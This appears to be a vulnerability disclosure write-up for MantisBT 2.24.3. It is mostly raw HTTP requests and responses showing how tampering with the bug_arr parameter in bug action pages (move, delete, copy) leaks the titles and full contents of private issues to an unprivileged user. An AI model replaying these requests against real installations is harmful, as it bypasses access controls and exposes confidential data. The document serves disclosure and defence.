```
### Attacker init
> This is just additonal information you can disregard this issue but because of internet connection issues I notice that when the attacker visit the http://localhost/mantisbt/mantisbt-2.24.3/manage_proj_edit_page.php?project_id= the project title can be disclose, it returns ``access denied`` but the dropdown for projects render the title of the project
- There are two ways to initialize for the attacker, the attacker have old report or the attacker can report a new issue, I will just use the create a new issue
**Request**
```
POST /mantisbt/mantisbt-2.24.3/bug_report.php?posted=1 HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101 Firefox/81.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------427049419225960153701985913573
Content-Length: 2423
Origin: http://localhost
Connection: close
Referer: http://localhost/mantisbt/mantisbt-2.24.3/bug_report_page.php
Cookie: MANTIS_collapse_settings=|attachment_preview_7:1|attachment_preview_7:0; MANTIS_VIEW_ALL_COOKIE=2; MANTIS_PROJECT_COOKIE=1; PHPSESSID=amqlo1b5cejja0rjrvjk8vds4j; MANTIS_secure_session=0; MANTIS_STRING_COOKIE=rEq9ipn3NCRWL2fefbubCfjZKQyRpOu_SLoBQO28Z9aopWLrHqmqMiFn7Vx_BzwE; MANTIS_BUG_LIST_COOKIE=6%2C4%2C5%2C3%2C2
Upgrade-Insecure-Requests: 1
-----------------------------427049419225960153701985913573
Content-Disposition: form-data; name="bug_report_token"
20200927Y7C9GOAmlETk2ohCgpLe0qIr2hRhYMgm
-----------------------------427049419225960153701985913573
Content-Disposition: form-data; name="m_id"
0
-----------------------------427049419225960153701985913573
Content-Disposition: form-data; name="project_id"
1
-----------------------------427049419225960153701985913573
Content-Disposition: form-data; name="category_id"
1
-----------------------------427049419225960153701985913573
Content-Disposition: form-data; name="reproducibility"
10
-----------------------------427049419225960153701985913573
Content-Disposition: form-data; name="severity"
20
-----------------------------427049419225960153701985913573
Content-Disposition: form-data; name="priority"
30
-----------------------------427049419225960153701985913573
Content-Disposition: form-data; name="platform"
-----------------------------427049419225960153701985913573
Content-Disposition: form-data; name="os"
-----------------------------427049419225960153701985913573
Content-Disposition: form-data; name="os_build"
-----------------------------427049419225960153701985913573
Content-Disposition: form-data; name="handler_id"
2
-----------------------------427049419225960153701985913573
Content-Disposition: form-data; name="summary"
Hello I am the attacker
-----------------------------427049419225960153701985913573
Content-Disposition: form-data; name="description"
Hello I am the attacker
-----------------------------427049419225960153701985913573
Content-Disposition: form-data; name="steps_to_reproduce"
Hello I am the attacker
-----------------------------427049419225960153701985913573
Content-Disposition: form-data; name="additional_info"
Hello I am the attacker
-----------------------------427049419225960153701985913573
Content-Disposition: form-data; name="tag_string"
-----------------------------427049419225960153701985913573
Content-Disposition: form-data; name="tag_select"
0
-----------------------------427049419225960153701985913573
Content-Disposition: form-data; name="max_file_size"
5000000
-----------------------------427049419225960153701985913573
Content-Disposition: form-data; name="view_state"
10
-----------------------------427049419225960153701985913573--
```
**Response**
```
HTTP/1.1 200 OK
Date: Sat, 26 Sep 2020 23:34:54 GMT
Server: Apache/2.4.41 (Win64) OpenSSL/1.0.2s PHP/7.1.33
X-Powered-By: PHP/7.1.33
Cache-Control: no-store, no-cache, must-revalidate
Last-Modified: Sat, 26 Sep 2020 23:34:54 GMT
Set-Cookie: MANTIS_collapse_settings=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/
X-Content-Type-Options: nosniff
Expires: Sat, 26 Sep 2020 23:34:54 GMT
X-Frame-Options: DENY
Content-Security-Policy: default-src 'self'; frame-ancestors 'none'; style-src 'self' 'unsafe-inline'; script-src 'self'; img-src 'self' 'self' data:
Vary: Accept-Encoding
Content-Length: 10525
Connection: close
Content-Type: text/html; charset=UTF-8
MantisBT
```
### Launch attack
-as manager go to your issue [http://localhost/mantisbt/mantisbt-2.24.3/view.php?id=8](http://localhost/mantisbt/mantisbt-2.24.3/view.php?id=8)
- 2 vulnerable function here are ``Move`` and ``Delete``, lets start with ``move`` functionality
**Normal request**
```
POST /mantisbt/mantisbt-2.24.3/bug_actiongroup_page.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101 Firefox/81.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 95
Origin: http://localhost
Connection: close
Referer: http://localhost/mantisbt/mantisbt-2.24.3/view.php?id=8
Cookie: MANTIS_collapse_settings=|attachment_preview_7:1|attachment_preview_7:0; MANTIS_VIEW_ALL_COOKIE=2; MANTIS_PROJECT_COOKIE=1; PHPSESSID=amqlo1b5cejja0rjrvjk8vds4j; MANTIS_secure_session=0; MANTIS_STRING_COOKIE=rEq9ipn3NCRWL2fefbubCfjZKQyRpOu_SLoBQO28Z9aopWLrHqmqMiFn7Vx_BzwE; MANTIS_BUG_LIST_COOKIE=6%2C4%2C5%2C3%2C2
Upgrade-Insecure-Requests: 1
bug_actiongroup_page_token=20200927VytbpqZq-H6AOMpwgFL3-510O_GESAhb&bug_arr%5B%5D=8&action=MOVE
```
- Just edit the ``bug_arr%5B%5D=`` to ``7`` <- private issue and it will render the summary/title of the issue
- ``Delete`` functionality is almost the same
**Normal request**
```
POST /mantisbt/mantisbt-2.24.3/bug_actiongroup_page.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101 Firefox/81.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 97
Origin: http://localhost
Connection: close
Referer: http://localhost/mantisbt/mantisbt-2.24.3/view.php?id=8
Cookie: MANTIS_collapse_settings=|attachment_preview_7:1|attachment_preview_7:0; MANTIS_VIEW_ALL_COOKIE=2; MANTIS_PROJECT_COOKIE=1; PHPSESSID=amqlo1b5cejja0rjrvjk8vds4j; MANTIS_secure_session=0; MANTIS_STRING_COOKIE=rEq9ipn3NCRWL2fefbubCfjZKQyRpOu_SLoBQO28Z9aopWLrHqmqMiFn7Vx_BzwE; MANTIS_BUG_LIST_COOKIE=6%2C4%2C5%2C3%2C2
Upgrade-Insecure-Requests: 1
bug_actiongroup_page_token=202009278EV6inaVGOOm_NWIFfBv911-mp-b93-g&bug_arr%5B%5D=8&action=DELETE
```
- Take note you can't move/delete these issues, it returns ``You did not have appropriate permissions to perform that action.`` however its too late, the summary/title already leaked..
### Copying issues : For fun fun fun!
- In this part the attacker manage to **fully leaked** the issues
- As malicious actor go to [http://localhost/mantisbt/mantisbt-2.24.3/view_all_bug_page.php?filter=5f6fd1cb80184](http://localhost/mantisbt/mantisbt-2.24.3/view_all_bug_page.php?filter=5f6fd1cb80184)
- You can see the ``Viewing issues`` part and the ``select all`` checkbox and a dropdown..
- The problem on this dropdown is the ``Copy`` functionality
> Note : I notice that the ``Assigned to Me (Unresolved)`` have different number of parameters,the ``bug_arr_all=all`` is required, go select the ``Assigned to Me (Unresolved)`` compare to ``unassigned`` which doesn't have ``bug_arr_all=all``
**Normal request**
```
POST /mantisbt/mantisbt-2.24.3/bug_actiongroup_page.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101 Firefox/81.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 43
Origin: http://localhost
Connection: close
Referer: http://localhost/mantisbt/mantisbt-2.24.3/view_all_bug_page.php?filter=5f6fd359dfcce
Cookie: MANTIS_collapse_settings=|attachment_preview_7:1|attachment_preview_7:0; MANTIS_VIEW_ALL_COOKIE=2; MANTIS_PROJECT_COOKIE=1; PHPSESSID=amqlo1b5cejja0rjrvjk8vds4j; MANTIS_secure_session=0; MANTIS_STRING_COOKIE=rEq9ipn3NCRWL2fefbubCfjZKQyRpOu_SLoBQO28Z9aopWLrHqmqMiFn7Vx_BzwE; MANTIS_BUG_LIST_COOKIE=8
Upgrade-Insecure-Requests: 1
bug_arr%5B%5D=8&bug_arr_all=all&action=COPY
```
**Normal response**
```
HTTP/1.1 200 OK
Date: Sat, 26 Sep 2020 23:50:18 GMT
Server: Apache/2.4.41 (Win64) OpenSSL/1.0.2s PHP/7.1.33
X-Powered-By: PHP/7.1.33
Cache-Control: no-store, no-cache, must-revalidate
Last-Modified: Sat, 26 Sep 2020 23:50:18 GMT
Set-Cookie: MANTIS_collapse_settings=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/
X-Content-Type-Options: nosniff
Expires: Sat, 26 Sep 2020 23:50:18 GMT
X-Frame-Options: DENY
Content-Security-Policy: default-src 'self'; frame-ancestors 'none'; style-src 'self' 'unsafe-inline'; script-src 'self'; img-src 'self' 'self' data:
Vary: Accept-Encoding
Content-Length: 11551
Connection: close
Content-Type: text/html; charset=UTF-8
MantisBT
```
- It will redirect to ``bug_actiongroup_page.php``
- Click the ``Copy issues``
**Request**
```
POST /mantisbt/mantisbt-2.24.3/bug_actiongroup.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101 Firefox/81.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 108
Origin: http://localhost
Connection: close
Referer: http://localhost/mantisbt/mantisbt-2.24.3/bug_actiongroup_page.php
Cookie: MANTIS_collapse_settings=|attachment_preview_7:1|attachment_preview_7:0; MANTIS_VIEW_ALL_COOKIE=2; MANTIS_PROJECT_COOKIE=1; PHPSESSID=amqlo1b5cejja0rjrvjk8vds4j; MANTIS_secure_session=0; MANTIS_STRING_COOKIE=rEq9ipn3NCRWL2fefbubCfjZKQyRpOu_SLoBQO28Z9aopWLrHqmqMiFn7Vx_BzwE; MANTIS_BUG_LIST_COOKIE=10%2C6%2C4%2C5%2C3%2C2
Upgrade-Insecure-Requests: 1
bug_actiongroup_COPY_token=202009271-2rIHMkDM1rpzJGjW1dFUysY9Sqp-5m&action=COPY&bug_arr%5B%5D=7&project_id=1
```
**Response**
```
HTTP/1.1 302 Found
Date: Sat, 26 Sep 2020 23:56:39 GMT
Server: Apache/2.4.41 (Win64) OpenSSL/1.0.2s PHP/7.1.33
X-Powered-By: PHP/7.1.33
Cache-Control: no-store, no-cache, must-revalidate
Last-Modified: Sat, 26 Sep 2020 23:56:39 GMT
Set-Cookie: MANTIS_collapse_settings=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/
X-Content-Type-Options: nosniff
Expires: Sat, 26 Sep 2020 23:56:39 GMT
X-Frame-Options: DENY
Content-Security-Policy: default-src 'self'; frame-ancestors 'none'; style-src 'self' 'unsafe-inline'; script-src 'self'; img-src 'self' 'self' data:
Location: http://localhost/mantisbt/mantisbt-2.24.3/view_all_bug_page.php
Vary: Accept-Encoding
Content-Length: 0
Connection: close
Content-Type: text/html; charset=utf-8
```
- we finally leaked the full information of a private issue !
### It's too late
The following function allows me to disclose the title this stuffs can be found on ``bug_actiongroup_page.php``
**This is the overall request they are just different action value**
```
POST /mantisbt/mantisbt-2.24.3/bug_actiongroup_page.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101 Firefox/81.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 43
Origin: http://localhost
Connection: close
Referer: http://localhost/mantisbt/mantisbt-2.24.3/view_all_bug_page.php?filter=5f6fd5c14a312
Cookie: MANTIS_collapse_settings=|attachment_preview_7:1|attachment_preview_7:0; MANTIS_VIEW_ALL_COOKIE=2; MANTIS_PROJECT_COOKIE=1; PHPSESSID=amqlo1b5cejja0rjrvjk8vds4j; MANTIS_secure_session=0; MANTIS_STRING_COOKIE=rEq9ipn3NCRWL2fefbubCfjZKQyRpOu_SLoBQO28Z9aopWLrHqmqMiFn7Vx_BzwE; MANTIS_BUG_LIST_COOKIE=8
Upgrade-Insecure-Requests: 1
bug_arr%5B%5D=8&bug_arr_all=all&action=YOUR_ACTION
```
The title for this section is too late because they don't allow the certain functionality but they already leaked the summary
- move issues returns ``You did not have appropriate permissions to perform that action.``
- assign issues returns ``You did not have appropriate permissions to perform that action.``
- close issue returns ``You did not have appropriate permissions to perform that action.``
- delete issue returns ``You did not have appropriate permissions to perform that action.``
- resolve issues returns ``You did not have appropriate permissions to perform that action.``
- set sticky return ``You did not have appropriate permissions to perform that action.``
- update priority returns ``You did not have appropriate permissions to perform that action.``
- update severity returns ``Access Denied.``
- update status returns ``You did not have appropriate permissions to perform that action.``
- update view returns ``You did not have appropriate permissions to perform that action.``
- add note returns ``Access Denied.``
- attach tags returns ``Attach permission denied.``